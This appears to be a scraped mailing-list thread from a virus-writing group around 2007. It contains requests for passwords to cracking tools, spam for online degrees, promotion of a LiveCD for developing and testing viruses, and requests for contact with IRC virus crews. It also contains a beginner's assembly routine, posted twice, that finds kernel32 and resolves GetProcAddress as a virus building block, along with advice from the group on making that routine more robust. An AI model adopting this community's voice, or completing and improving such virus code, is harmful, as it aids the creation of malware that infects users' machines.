what is the password of Cracking Password with only Physical Access?

Get the skype software, install it and register one ID. i create the chatting
room. Search and add me lclee_vx. will add you in the chatting room list.

thanks

Hello everyone

http://blogs.technet.com/mmpc/default.aspx

Please, help me with this tool - PEid full. Password needed... Have
Anybody got it?... )

The fast paced advancements in education and technology require us to
keep up to date in the chosen field. We also need to improve our skill
sets or study a new discipline to meet ever growing competition in the
job market. Online degrees offer the best solution to all of us as we
don't have to attend regular classes leaving our present commitments.

Visit the website for some valuable tips on how to get online degrees
from world's renowned universities to improve our academics and
further our career interests: http://onlinedegrees.advisoronline.info

The More You Learn The More You Earn
* Don't quit your job
* Obtain your degree online on your schedule
* Earn more money

Average Salary Pattern:

High School Diploma - $34k
Associate Degree - $46k
Bachelor's Degree - $65k
Master's Degree - $83k
PG Degrees - $103k

Visit the website for some valuable tips on how to get online degrees:
http://onlinedegrees.advisoronline.info

dear friends
pls send me password for ollydbg and peid full version.

thank's

This is another version of F-13 LiveCD version 0.1. The tool include
as below:

1.Compiler:fasm, nasm, masm, tasm
2.Debugger: OllyICE[modified version OllyDebug include unpack
scripts], IDA Pro [Free Version]
3.Antivirus: Nod32 [Just for checking/scanning your new virus]
4.Assembly Editor: RadASM
5.Network:fport, sniffer, tcpview, wpe [check the network spreading
of your new virus]
6.PE Tool:APIscan, heapmemview[32bit], heapmemview-x64[64bit],
hexworkshop, lordPE, stud_PE, PEiD, Winhex...

Main for this LiveCD is to develop the virus and create the safety
environment for you to code the vx. Hmm...i am planning to include
the virus sample, utilities, virus library[the routine of retrieve
kernel32 address, api scanning etc] in next version.

Any idea and comment [good or bad] please let me know.

http://www.f13-labs.net/tool/F13-LiveCD/F13LiveCD.htm

Happy virus code!!

for dezend.rar please

same here =) ..... hail the vx scene

hey all,
i need password for passware kit &
PEID+plugins+tools
plz provide the same..

hi Group
this group i was looking for
any 1 can help me in this

the site http://www.f13-labs.net
have this tool

PEid + Plugins + Tools [Download]

    Note: This PEid tool is famous in cracking stuff. The archive
include all the plugins and unpack/signature creator tool inside.
Complete.

             Anyhow, this tool is for member only, ask the password
in "Gathering" forum.


i need the pass for rar file plzzzzzzzzz

sweet!

I'ma start a new code for this probably in visual basic...

when I have my ideas made I'll either write you my information/ideas
or post them here....either way

you'll here from me soon!

--- In F-13Labs@yahoogroups.com, lclee_vx <lclee_vx@...> wrote:
>
> we are welcome any vx (virus) codes & ideas
>
>
> ----- Original Message ----
> From: b00t_wizard <b00t_wizard@...>
> To: F-13Labs@yahoogroups.com
> Sent: Saturday, December 29, 2007 11:59:37 AM
> Subject: [F-13Labs] Re: New Ezine
>
> any room for :
> visual basic/studio programming , net &/or software background
ethics
> let me know!
>
> --- In F-13Labs@yahoogroup s.com, "lclee_vx" <lclee_vx@ .> wrote:
> >
> > Dear F-13 members,
> >
> > I am planning to come out the new Ezine for 2008, what say you?
> >
> >
> > from lclee_vx
> >
>
>
>
>
>
>
______________________________________________________________________
______________
> Looking for last minute shopping deals?
> Find them fast with Yahoo! Search.
http://tools.search.yahoo.com/newsearch/category.php?category=shopping
>

any room for :
visual basic/studio programming , net &/or software background ethics
let me know!


--- In F-13Labs@yahoogroups.com, "lclee_vx" <lclee_vx@...> wrote:
>
> Dear F-13 members,
>
> I am planning to come out the new Ezine for 2008, what say you?
>
>
> from lclee_vx
>

definitley useful & a great idea!

--- In F-13Labs@yahoogroups.com, "lclee_vx" <lclee_vx@...> wrote:
>
> This is the windows LiveCD, i include the famous asm compiler such as
> masm32, tasm32, nasm32 and fasm32, OllyDebug and ASM editor.
>
> Just download and burn into cd and boot the cd.
>
> I created this LiveCD for virus code development and virus analysist
> purpose.
>
> will add other tool and functions soon.
>
> any comment, good or bad please let me know.
>
> http://www.f13-labs.net/tool/F13-LiveCD/F13LiveCD.htm
>
>
> from lclee_vx/F-13 & lychan25/F-13
>

---

To: F-13Labs@yahoogroups.com
From: lclee_vx@...
Date: Tue, 13 Nov 2007 20:14:01 +0000
Subject: [F-13Labs] F-13 LiveCD

This is the windows LiveCD, i include the famous asm compiler such as
masm32, tasm32, nasm32 and fasm32, OllyDebug and ASM editor.

Just download and burn into cd and boot the cd.

I created this LiveCD for virus code development and virus analysist
purpose.

will add other tool and functions soon.

any comment, good or bad please let me know.

http://www.f13-labs.net/tool/F13-LiveCD/F13LiveCD.htm

from lclee_vx/F-13 & lychan25/F-13

This is the windows LiveCD, i include the famous asm compiler such as
masm32, tasm32, nasm32 and fasm32, OllyDebug and ASM editor.

Just download and burn into cd and boot the cd.

I created this LiveCD for virus code development and virus analysist
purpose.

will add other tool and functions soon.

any comment, good or bad please let me know.

http://www.f13-labs.net/tool/F13-LiveCD/F13LiveCD.htm


from lclee_vx/F-13 & lychan25/F-13

count me in!
I've been working with some naughty codez...lol

Hai,

I need 10 ID in undernet for apply the new channel

Please register in
http://cservice.undernet.org/live/

and revert the ID to me.

Thanks

Hai,

I need 10 ID in undernet for apply the new channel

Please register in
http://cservice.undernet.org/live/

and revert the ID to me.

Thanks

Let's do it :)



--- In F-13Labs@yahoogroups.com, "lclee_vx" <lclee_vx@...> wrote:
>
> Dear F-13 members,
>
> I am planning to come out the new Ezine for 2008, what say you?
>
>
> from lclee_vx
>

ive heard of it,havent looked into it,
I wouldnt mind knowing a little bit more about it

--- In F-13Labs@yahoogroups.com, ï¿ ³Â <silence_vx@...> wrote:
>
> hi sanzilla jackcat
> i had read your code and find some code is unuseful !!!
> i post code which is also to search APIS
> i hope it can help you ^-^
Thanks man i got the code . Man how to find other virus crues in the
IRC ? what are the servers and what are the usernames and passwords
man ? how to find out some real virus source code analysis with little
more comments man ? Are you on IRC ? chat ?

--- In F-13Labs@yahoogroups.com, ï¿ ³Â <silence_vx@...> wrote:
>
> hi sanzilla jackcat
>          i had read your code and find some code is unuseful !!!
>          i post code which is also to search APIS
>          i hope it can help you ^-^
Thanks man i got the code . Man how to find other virus crues in the
IRC ? what are the servers and what are the usernames and passwords
man ? how to find out some real virus source code analysis with little
more comments man ? Are you on IRC ? chat ?

Hai,

I did not go through the detail of your code (busy on study
now)...anyhow..just my opinion, refer to the following code:

XPKernel32BaseAddress equ 77E60000h

as i know..you tried to fix the kernel32 base address...this may
cause the exception when the code not successful to look for the
right address..

try add another routine search for kernel32.dll base address
random..refer to my article the technic checksum...

cheer...

and nice code !!

i will study again your code and get back tto you :)

--- In F-13Labs@yahoogroups.com, "sandundhammikaperera"
<sandundhammikaperera@...> wrote:
>
> man I read the articles and find out the ways to get the kernel32
> base address on the hardcorded method and I done some
GetProcAddress
> search . But the problem in this is I got an exception . why was
> that ?
> my code is this .
> First I write the code but the variables in the code segment are
> read only thus I changet that segment attributes and try again
> already then in I debugging on the ollydebug it faills when it
scans
> the 2Dh element of the export table of the Kernel32.dll what a
fuck
> is this ? Please help me man please ... Please ... I'm very
curious
> now . I just cant breath without assembly now . Please man help me
> give me some drugs .
>
>
> This is my source code .
> ------------------------------------------------code begins ------
>
>     .586
>     .model flat , stdcall
>     option casemap : none
> include c:\masm32\include\kernel32.inc
> includelib c:\masm32\lib\kernel32.lib
> include c:\masm32\include\user32.inc
> includelib c:\masm32\lib\user32.lib
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
>
>
> .code
> start:
>     call GetDelta
>  GetDelta:
>     pop ebp
>     sub ebp , OFFSET GetDelta - OFFSET start
> XPKernel32BaseAddress equ 77E60000h
>     mov eax , XPKernel32BaseAddress
>     call CheckForK32
>     cmp eax , 0000000h
>     jne  ExitLoop
>     mov eax , XPKernel32BaseAddress
>     call GetApiAddress
>     ;; now we are going to print a messageBox
>     invoke ExitProcess , 0
>
>
>
>
>
> ExitLoop:
>     ;; return to the host code in our virus .
>
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
>
>
>
>
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
> CheckForK32 proc
>     cmp word ptr [ eax ] , 'ZM'
>     jne NotFound
>     add eax , 3ch
>     mov eax , [eax]
>     add eax , XPKernel32BaseAddress
>     cmp word ptr [ eax ] , 'EP'
>     jne NotFound
>     xor eax  , eax
>     ret
> NotFound:
>     ;; die
> CheckForK32 endp
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
>
>
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
> aPEHelder dd 0
> aimportDir dd 0
> aAddressTable dd 0
> aNameTable dd 0
> aOrdinalTable dd 0
> nOfExports dd 0
> sGetProcAddress db 'GetProcAddress' ,0
> aGetProcAddress dd 0
>
> GetApiAddress proc
>     ;; oky now we have to get the PE real address
>     mov eax , [eax+3ch]
>     mov [ebp + (OFFSET aPEHelder - OFFSET start) ] , eax
>     add eax , XPKernel32BaseAddress
>     mov [ebp+( OFFSET aPEHelder- OFFSET start) ] , eax
>     ;; now there is PE helder address in the eax
>     ;; we shall play with it .
>     ;; Then we need is the place where VA of import dir is kept
>     ;; it is on the 78h
>     add  eax , 78h
>     mov eax,dword ptr [ eax ]
>     add eax , XPKernel32BaseAddress
>     push eax
>     mov [ebp + (OFFSET aimportDir- OFFSET start) ] , eax
>     ;;oky we are pointed to the import table in eax
>     ;; oky then get the addresstableRVA
>     add eax , 1ch
>     mov eax , [eax]
>     add eax , XPKernel32BaseAddress
>     mov dword ptr [ebp + (OFFSET aAddressTable-OFFSET start)] , eax
>     pop eax
>     ;; oky now we shoud have the Name PTR table
>     push eax
>     add eax , 20h
>     mov eax , dword ptr [eax]
>     add eax , XPKernel32BaseAddress
>     mov dword ptr [ebp + (OFFSET aNameTable - OFFSET start) ] , eax
>     pop eax
>     push eax
>     ;;Now we should get the Ordinal table
>     add eax , 24h
>     mov eax , dword ptr [eax]
>     add eax , XPKernel32BaseAddress
>     mov dword ptr [ ebp+ ( OFFSET aOrdinalTable - OFFSET start)] ,
> eax
>     pop eax
>     push eax
>     ;; now we have to get nunber of exports
>     add eax , 18h
>     mov eax , dword ptr [eax]
>     mov dword ptr [ebp + (OFFSET nOfExports- OFFSET start) ] , eax
>     mov ecx , eax
>     pop eax
>
>     ;; Now we have to search for the APIs , Lets go
>     ;; we shoud put the nOfExports to the ecx oky
>     ;; virus leavaman sanaseama laba! .
>     mov eax , dword ptr [ ebp + (OFFSET aNameTable - OFFSET start)]
>     ;; now the eax is pointed to the first address of the string
> name
>     mov edx , 0
>     lea esi , [ebp +(OFFSET sGetProcAddress- OFFSET start)]
>     mov ebx , esi
> CheckNext:
>     push edx
>     shl edx , 2
>     add eax , edx
>     pop edx
>     mov edi , dword ptr [ eax ]
>     add edi , XPKernel32BaseAddress
>     inc edx
>     mov esi , ebx
> CheckByte:
>     ;; we have to compare the bytes in EDI with ESI
>     cmpsb
>     jne CheckNext
>     cmp byte ptr [esi] , 0
>     je  GotIt
>     cmp edx , ecx
>     je  ExitLoop        ;; what a shitt this is not kernel32 what
a
> fuck .
>     jmp CheckByte
> GotIt:
>     ;; oky we now get that shitt . Oky now we have to store this
> shitt
>     ;; its on the count of edx +1
>     ;; but in the loop it was already incremented .This is where
> aAddressTable was need
>     mov eax , [ebp + (OFFSET aAddressTable - OFFSET start) ]
>     mov eax , [eax]
>     push edx
>     shl edx , 2
>     add eax , edx
>     pop edx
>     mov eax , [eax]
>     mov [ebp + (OFFSET aGetProcAddress-OFFSET start) ] , eax
>     xor eax , eax
>     xor edx , edx
>     ret
> GetApiAddress endp
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
> ;;;
> end start
>
> -------------------------------------------------------------------
-
> please make sure to changet the attributes on the segments to full
> access in order to avoid memory access violations under ollydbg.
>
>
> oky man please help me man . I just a beaganner to the assembly
> langaueg and virus writing . I need to go to the hell .
>                                      by : sanzilla jackcat
>
> sandundhammikaperera@...
>

man I read the articles and find out the ways to get the kernel32
base address on the hardcorded method and I done some GetProcAddress
search . But the problem in this is I got an exception . why was
that ?
my code is this .
First I write the code but the variables in the code segment are
read only thus I changet that segment attributes and try again
already then in I debugging on the ollydebug it faills when it scans
the 2Dh element of the export table of the Kernel32.dll what a fuck
is this ? Please help me man please ... Please ... I'm very curious
now . I just cant breath without assembly now . Please man help me
give me some drugs .


This is my source code .
------------------------------------------------code begins ------

     .586
     .model flat , stdcall
     option casemap : none
include c:\masm32\include\kernel32.inc
includelib c:\masm32\lib\kernel32.lib
include c:\masm32\include\user32.inc
includelib c:\masm32\lib\user32.lib
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


.code
start:
     call GetDelta
  GetDelta:
     pop ebp
     sub ebp , OFFSET GetDelta - OFFSET start
XPKernel32BaseAddress equ 77E60000h
     mov eax , XPKernel32BaseAddress
     call CheckForK32
     cmp eax , 0000000h
     jne  ExitLoop
     mov eax , XPKernel32BaseAddress
     call GetApiAddress
     ;; now we are going to print a messageBox
     invoke ExitProcess , 0





ExitLoop:
     ;; return to the host code in our virus .

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;




;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
CheckForK32 proc
     cmp word ptr [ eax ] , 'ZM'
     jne NotFound
     add eax , 3ch
     mov eax , [eax]
     add eax , XPKernel32BaseAddress
     cmp word ptr [ eax ] , 'EP'
     jne NotFound
     xor eax  , eax
     ret
NotFound:
     ;; die
CheckForK32 endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
aPEHelder dd 0
aimportDir dd 0
aAddressTable dd 0
aNameTable dd 0
aOrdinalTable dd 0
nOfExports dd 0
sGetProcAddress db 'GetProcAddress' ,0
aGetProcAddress dd 0

GetApiAddress proc
     ;; oky now we have to get the PE real address
     mov eax , [eax+3ch]
     mov [ebp + (OFFSET aPEHelder - OFFSET start) ] , eax
     add eax , XPKernel32BaseAddress
     mov [ebp+( OFFSET aPEHelder- OFFSET start) ] , eax
     ;; now there is PE helder address in the eax
     ;; we shall play with it .
     ;; Then we need is the place where VA of import dir is kept
     ;; it is on the 78h
     add  eax , 78h
     mov eax,dword ptr [ eax ]
     add eax , XPKernel32BaseAddress
     push eax
     mov [ebp + (OFFSET aimportDir- OFFSET start) ] , eax
     ;;oky we are pointed to the import table in eax
     ;; oky then get the addresstableRVA
     add eax , 1ch
     mov eax , [eax]
     add eax , XPKernel32BaseAddress
     mov dword ptr [ebp + (OFFSET aAddressTable-OFFSET start)] , eax
     pop eax
     ;; oky now we shoud have the Name PTR table
     push eax
     add eax , 20h
     mov eax , dword ptr [eax]
     add eax , XPKernel32BaseAddress
     mov dword ptr [ebp + (OFFSET aNameTable - OFFSET start) ] , eax
     pop eax
     push eax
     ;;Now we should get the Ordinal table
     add eax , 24h
     mov eax , dword ptr [eax]
     add eax , XPKernel32BaseAddress
     mov dword ptr [ ebp+ ( OFFSET aOrdinalTable - OFFSET start)] ,
eax
     pop eax
     push eax
     ;; now we have to get nunber of exports
     add eax , 18h
     mov eax , dword ptr [eax]
     mov dword ptr [ebp + (OFFSET nOfExports- OFFSET start) ] , eax
     mov ecx , eax
     pop eax

     ;; Now we have to search for the APIs , Lets go
     ;; we shoud put the nOfExports to the ecx oky
     ;; virus leavaman sanaseama laba! .
     mov eax , dword ptr [ ebp + (OFFSET aNameTable - OFFSET start)]
     ;; now the eax is pointed to the first address of the string
name
     mov edx , 0
     lea esi , [ebp +(OFFSET sGetProcAddress- OFFSET start)]
     mov ebx , esi
CheckNext:
     push edx
     shl edx , 2
     add eax , edx
     pop edx
     mov edi , dword ptr [ eax ]
     add edi , XPKernel32BaseAddress
     inc edx
     mov esi , ebx
CheckByte:
     ;; we have to compare the bytes in EDI with ESI
     cmpsb
     jne CheckNext
     cmp byte ptr [esi] , 0
     je  GotIt
     cmp edx , ecx
     je  ExitLoop        ;; what a shitt this is not kernel32 what a
fuck .
     jmp CheckByte
GotIt:
     ;; oky we now get that shitt . Oky now we have to store this
shitt
     ;; its on the count of edx +1
     ;; but in the loop it was already incremented .This is where
aAddressTable was need
     mov eax , [ebp + (OFFSET aAddressTable - OFFSET start) ]
     mov eax , [eax]
     push edx
     shl edx , 2
     add eax , edx
     pop edx
     mov eax , [eax]
     mov [ebp + (OFFSET aGetProcAddress-OFFSET start) ] , eax
     xor eax , eax
     xor edx , edx
     ret
GetApiAddress endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
end start

--------------------------------------------------------------------
please make sure to changet the attributes on the segments to full
access in order to avoid memory access violations under ollydbg.


oky man please help me man . I just a beaganner to the assembly
langaueg and virus writing . I need to go to the hell .
                                      by : sanzilla jackcat

sandundhammikaperera@...